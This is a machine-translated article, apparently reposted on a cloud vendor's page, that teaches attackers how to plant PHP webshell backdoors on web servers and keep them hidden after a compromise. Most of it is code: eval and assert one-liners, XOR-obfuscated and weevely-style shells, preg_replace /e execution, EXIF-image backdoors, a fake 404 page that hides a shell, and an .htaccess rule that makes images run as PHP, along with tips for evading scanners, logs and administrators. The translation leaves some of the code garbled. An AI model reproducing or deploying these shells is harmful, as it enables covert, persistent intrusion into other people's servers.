PHP backdoor hiding and maintenance skills, php backdoor skills

Source: Internet
Author: User

PHP backdoor hiding and maintenance skills, php backdoor skills

After a successful test, we usually want to keep the privilege longer. the work of leaving a backdoor is crucial. Generally, the backdoor layout includes but is not limited to database permissions, WEB permissions, system user permissions, and so on. in this article, some ideas hidden from the public backdoors are popularized.

AD:

0 × 00 Preface

After a successful test, we usually want to keep the privilege longer. the work of leaving a backdoor is crucial. Generally, the backdoor layout includes but is not limited to database permissions, WEB permissions, system user permissions, and so on. this article describes some ideas hidden from the public backdoors.

  • <? Php @ eval ($ _ POST ['cmd']);?>
  • Or

    1. <? Php @ assert ($ _ POST ['cmd']);?>

    Of course, this is only different from the called functions. For PHP Disabled functions, find them in php. ini: disable_functions.

    However, there are also many ways for O & M to intuitively find our shell, such

    ◆ An exception was found during file backup comparison by file name/modification time/size

    ◆ WEBSHELL scan scripts, such as Scanbackdoor. php/Pecker/shelldetect. php and various Scanners

    ◆ Access. log is used to find the backdoor

    ◆ Or, we will be blocked by WAF for a test sentence, and a warning log, etc.

    For common detection methods, summarize the following seven common methods to hide shell

    0 × 01 avoidance

    Look at the various backdoor scanning code and you will know, leaving a well-known keyword in shell is absolutely impossible.

    Common keywords include:

    ◆ System Command Execution: system, passthru, shell_exec, exec, popen, proc_open

    ◆ Code execution: eval, assert, call_user_func, base64_decode, gzinflate, gzuncompress, gzdecode, str_rot13

    ◆ File Inclusion: require, require_once, include, include_once, file_get_contents, file_put_contents, fputs, fwrite

    In the past, some friends wittically used $ _ POST [0] ($ _ POST [1]) to execute commands. Unfortunately, it is still difficult to escape the scanner's eye, but the construction method is infinite in Vientiane.

    Tudouya provides [A Construction Technique] (http://www.freebuf.com/articles/web/33824.html) Exploitation on FREEBUF.

    1. <? Php
    2. @ $ _ ++; // $ _ = 1
    3. $ __= ("#" ^ "|"); // $ __= _
    4. $ __. = ("." ^ "~ "); // _ P
    5. $ __. = ("/" ^ "'"); // _ PO
    6. $ __. = ("|" ^ "/"); // _ POS
    7. $ __. = ("{" ^ "/"); // _ POST
    8. $ {$ __}[! $ _] ($ {$ __} [$ _]); // $ _ POST [0] ($ _ POST [1]);
    9. ?>

    Construct and generate, of course, too intuitive to write

    1. <? Php @ $ _ ++; $ __= ("#" ^ "|"). ("." ^ "~ "). ("/" ^ "'"). ("|" ^ "/"). ("{" ^ __}[! $ _] ($ {__} [$ _]);?>

    Then fill in some common code for disguise. A simple "Kill-free" shell sample will appear.

    Run the command correctly and bypass the common scanner. You can also use it to write a new temporary shell.

     

    0 × 02 features

    Using syntax features to execute commands is also an interesting method. Using the syntax features of php when processing variables, it will analyze whether the data in double quotation marks contains variables (and parse their values)

    Eg .:

    1. $ {@ Eval (phpinfo ())}

    {} The variable content in double quotation marks can be parsed. @: Keep the variable running after an error occurs.

    Then we can shake the chart and start to construct a hidden backdoor. But here we want to construct the command execution caused by the function. That's right, it's preg_replace.

    1. <? Php @ preg_replace ("// e", $ _ POST ['cmd'], "");?>

    This method has already been blacklisted by the scanner. You can simply modify it.

    1. <? Php
    2. Function funfunc ($ str ){}
    3. Echo preg_replace ("/<title> (. + ?) <\/Title>/ies ", 'funfunc (" \ 1 ") ', $ _ POST [" cmd "]);
    4. ?>

    Executed, not found

    The execution method is obvious. code execution is triggered when the {$ {phpinfo ()} passed in funfunc after regular expression matching.

    1. Funfunc ("{$ {phpinfo ()}}")

    Another method

    1. <? Php @ assert ("\ $ arr = \" ". $ _ GET ['cmd']." \ ";");?>

    0 × 03 contain

    File Inclusion is a method that has been used by everyone, but it also contains skills.

    A common file may only contain an include file containing a txt or jpg file, or even directly contains a vulnerability. However, the scanner is also easy to detect, and more include files are easy to detect.

    Check this script

    1. <? Php
    2. If (@ isset ($ _ GET [content])
    3. {
    4. $ Fp = fopen ('readme ', 'w ');
    5. File_put_contents ('readme ', "<? Php \ r \ n ");
    6. @ File_put_contents ('readme ', $ _ GET [content], FILE_APPEND );
    7. Fclose ($ fp );
    8. Require 'readme ';}
    9. ?>

    It solves a problem. The required shell can be generated as needed, and then include

    Unfortunately, file_put_contents and other functions are too sensitive and can be easily scanned and discovered.

    Code Generation Method to create a shell, which is generated with access.

    1. <? Php @ fputs (fopen (base64_decode ('cgx1z2lux20ucghw'), w), base64_decode ('samples/Pg = '));
    2. ?>

    Some scanners can be avoided, but this mode is also quite eye-catching. The new files generated must also be easily hidden to escape detection and removal.

    Of course, we will not consider new concepts such as heuristic.

    In this way, attackers can not meet their needs.

    1. <? Php $ exif = exif_read_data ('./lol.jpg'); preg_replace ($ exif ['make'], $ exif ['model'], '');?>

    Reference: a backdoor hidden in jpg image EXIF

    This time, you do not need to simply copy/B to generate an image horse. It is just as feasible to use the specific marker of the preg_replace execution file.

    The following message may be displayed: Call to undefined function exif_read_data ()

    You need to modify php. ini, extension = php_exif.dll

    Change the Loading Order to the end of extension = php_mbstring.dll.

    As you can see, this image Backdoor uses the preg_replace \ e parameter, relies on php variable parsing and execution, and uses base64 encoding. Finally, relies on the file ID to splice a complete shell, A small reminder for kids shoes hidden from Backdoors

    Of course, as long as there are include points, the forms of including files are diverse, and even include error_log (although it may be worth consideration), only unexpected...

    0 × 04 hiding

    In order to prevent visitors from discovering the existence of backdoors, smart security researchers will also be confused.

    1. <! Doctype html public "-// IETF // dtd html 2.0 // EN">
    2. <Html>
    3. <Title> 404 Not Found </title>
    4. </Head>
    5. <Body>
    6. <H1> Not Found
    7. <P> The requested URL was not found on this server. </p>
    8. </Body>
    9. </Html>
    10. <? Php
    11. @ Preg_replace ("/[checksql]/e", $ _ POST ['cmd'], "saft ");
    12. ?>

    With the help of the above html Rendering, browsing the page has begun to disguise 404 to confuse the audio and video

    However, visitors cannot hide log analysis. To better hide a large number of logs, construct the following script:

    1. <? Php
    2. Header ('HTTP/1.1 404 ');
    3. Ob_start ();
    4. @ Fputs (fopen (base64_decode ('cgx1z2lux20ucghw'), w), base64_decode ('samples/Pg = '));
    5. Ob_end_clean ();
    6. ?>

    The access is actually 404. That's right. The same is true in the log.

    However, the current directory has generated the script to be connected.

    0 × 05 Obfuscation

    We should know that the kids shoes that have used the weevely tool generate a kill-free shell like this.

    1. <? Php
    2. $ Penh = "bytes = ";
    3. $ Kthe = "success ";
    4. $ Ftdf = str_replace ("w", "", "stwrw_wrwepwlwawcwe ");
    5. $ Wmmi = "Hangzhou ";
    6. $ Zrmt = "Hangzhou ";
    7. $ Smgv = $ ftdf ("f", "", "bfafsfef6f4_fdfefcodfe ");
    8. $ Jgfi = $ ftdf ("l", "", "lclrlelaltel_functlilon ");
    9. $ Rdwm = $ jgfi ('', $ smgv ($ ftdf (" gi "," ", $ zrmt. $ kthe. $ wmmi. $ penh); $ rdwm ();
    10. ?>

    This is what follows the connection under the terminal

    Ps: I forgot to modify the terminal code :(

    The kill-free method is to generate random name variables in a fixed area, and then use str_replace to splice base64_decode to execute the command.

    Of course, this is to hide the audio and video at the code level to escape the scanner

    More common methods for audio/video recognition:

    ◆ File modification time

    ◆ Rename the file to the uploaded folder, which makes it impossible to see the file exception

    ◆ Disguised processing of file size (at least looks like a normal script)

    ◆ Select the hiding path and minimize access

    ◆ Malformed directory % 20

    Space directories are relatively easy to find.

    0 × 06 Parsing

    Use. htaccess to add resolution Backdoors

    For example:

    1. AddType application/x-httpd-php. jpg

    Take weeverly as an example.

    0x07 Mixture

    To sum up the above methods, most of them are just a process of constructing vulnerabilities. The Code Constructed by vulnerabilities can be amazing, and the backdoor can be amazing. you can write fine and graceful statements, or you can make simple and rude statements, but it is only applicable to different scenarios. it is not difficult to construct your own hidden shell if you can integrate your ideas well. the above is just a summary of experience. You may have interesting ideas and hope to give me some advice.

    Contact Us

    The content source of this page is from Internet, which doesn't represent Alibaba Cloud's opinion; products and services mentioned on that page don't have any relationship with Alibaba Cloud. If the content of the page makes you feel confusing, please write us an email, we will handle the problem within 5 days after receiving your email.

    If you find any instances of plagiarism from the community, please send an email to: info-contact@alibabacloud.com and provide relevant evidence. A staff member will contact you within 5 working days.

    A Free Trial That Lets You Build Big!

    Start building with 50+ products and up to 12 months usage for Elastic Compute Service

    • Sales Support

      1 on 1 presale consultation

    • After-Sales Support

      24/7 Technical Support 6 Free Tickets per Quarter Faster Response

    • Alibaba Cloud offers highly flexible support services tailored to meet your exact needs.